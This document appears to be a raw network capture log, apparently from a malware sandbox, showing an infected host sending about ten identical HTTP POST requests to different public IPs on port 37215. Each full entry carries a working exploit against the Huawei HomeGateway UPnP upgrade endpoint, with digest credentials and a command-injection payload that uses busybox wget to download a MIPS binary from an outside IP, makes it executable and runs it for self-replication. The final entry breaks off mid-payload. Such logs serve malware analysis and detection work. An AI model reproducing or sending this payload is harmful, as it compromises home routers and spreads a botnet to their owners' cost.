                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1382192.168.2.1347636160.251.192.8237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.481415033 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1383192.168.2.1359212187.111.185.2037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.481419086 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1384192.168.2.1355316157.125.80.9137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.481435061 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1385192.168.2.1356456134.153.99.637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.481435061 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1386192.168.2.1350552202.182.211.9437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.481443882 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1387192.168.2.1342728207.4.37.20137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.481893063 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1388192.168.2.135483024.110.221.1637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.481991053 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1389192.168.2.1351682167.108.34.23537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.481997013 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1390192.168.2.1355002157.223.24.8937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.481996059 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1391192.168.2.1337968157.72.155.8037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.482095957 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 